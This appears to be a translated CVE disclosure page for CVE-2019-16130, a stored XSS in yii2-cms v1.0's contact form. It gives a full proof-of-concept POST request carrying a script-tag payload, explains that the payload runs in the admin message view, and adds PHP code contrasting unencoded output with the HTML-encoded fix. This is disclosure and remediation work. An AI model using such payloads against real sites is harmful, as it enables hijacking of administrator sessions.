CVE中文申请站 (CVE Chinese Application Site)

CVE-2019-16130: Stored XSS in yii2-cms v1.0

I. Vulnerability Summary

Vulnerability name: Stored XSS in yii2-cms v1.0
Report date: 2019-08-31
Reporter: 王鹏翔
Product homepage: http://cms.mym.pub/
Software link: https://github.com/weison-tech/yii2-cms
Version: v1.0
CVE ID: CVE-2019-16130


II. Vulnerability Overview

yii2-cms is a CMS built on the yii2 basic template that you can use to build your own corporate website. The front end does not limit the length of user input, and protected/core/modules/home/models/Contact.php does not limit the length of the user-supplied name field.
[Screenshot: 1.png]
PoC request for submitting the content:

POST /contact.html HTTP/1.1
Host: locahost
Content-Length: 306
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/contact.html
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1567164052; language=213818186103fa19c30d2710ecd18c48946ee2fed0bdcf0e471bab24ce058358a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A5%3A%22zh_cn%22%3B%7D; PHPSESSID=38ddvm4dugu5jdq4pt0h02qr5s; _csrf=5e85092cfa3136d9cc8ee4322826276d759fd8c851c83ede47293177c4fe9153a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22O12VBFrR_KCflwAXh8qvr4LMjscRlbem%22%3B%7D
Connection: close

_csrf=Aaq-w1PPi7_1C1seTIMQh0aI7VOoXKOf96plwSzQ9fpOm4yVEYn57apAGHgg9FHfLrCcJdpo79Kd2QaTQLKQlw%3D%3D&Contact%5Bname%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Contact%5Bemail%5D=133333%40qq.com&Contact%5Bmobile%5D=13333333333&Contact%5Bcompany%5D=1&Contact%5Bdemand%5D=1

[Screenshot: 2.png]
protected/core/modules/home/admin/views/contact/view.php also does not filter JS code,
so we then open the admin back end to view the message:
[Screenshot: 3.png]


III. Exploit Code

The exploit is as follows: enter <script>alert(1)</script> in the name field of the message form.
After clicking submit, the alert box appears in the message management page of the admin back end.
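As an added illustration (not code from the yii2-cms project), the following stand-alone PHP contrasts the rendering pattern that produces this stored XSS in the admin message list with the corrected one. Outside Yii it calls htmlspecialchars() directly, which is what yii\helpers\Html::encode() wraps; in a Yii2 view the idiomatic call is Html::encode($model->name). The $contact array and the function names are constructed for the example.

```php
<?php
// Added example, not yii2-cms's own code. Shows the two rendering paths for a
// stored contact record in the admin back end: echoing the name verbatim (the
// bug) versus HTML-encoding it on output (the fix).

// Constructed sample: the record the PoC request above would leave in the DB.
$contact = [
    'name'    => '<script>alert(1)</script>',
    'email'   => '133333@qq.com',
    'company' => '1',
];

// Vulnerable pattern: the stored value is concatenated into markup unchanged,
// so the admin's browser executes it when the message is viewed.
function renderRowVulnerable(array $c): string
{
    return '<tr><td>' . $c['name'] . '</td><td>' . $c['email'] . '</td></tr>';
}

// Hardened pattern: every user-controlled value is encoded for an HTML text
// context. ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently dropping the whole string. These are the same
// flags yii\helpers\Html::encode() uses.
function e(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderRowSafe(array $c): string
{
    return '<tr><td>' . e($c['name']) . '</td><td>' . e($c['email']) . '</td></tr>';
}

// Input-side check belonging in the model layer (a 'string' rule with 'max'
// in Contact::rules() in Yii2 terms). A length cap limits abuse but is not a
// substitute for output encoding: a short payload still fits.
function nameIsAcceptable(string $name, int $max = 64): bool
{
    $len = mb_strlen($name, 'UTF-8');
    return $len >= 1 && $len <= $max;
}

$bad  = renderRowVulnerable($contact);
$good = renderRowSafe($contact);
assert(str_contains($bad, '<script>'));    // payload reaches the browser as markup
assert(!str_contains($good, '<script>'));  // encoded to &lt;script&gt; text
echo $good, PHP_EOL;
```

Run with php -d zend.assertions=1 so the two assert() calls are evaluated; the encoded row is printed and the vulnerable row is never sent to a browser.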

IV. References

CVE Chinese Application Site: http://www.iwantacve.cn/index.php/archives/277/
GitHub: https://github.com/weison-tech/yii2-cms/issues/2
CVE official: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16130
exploit-db: pending publication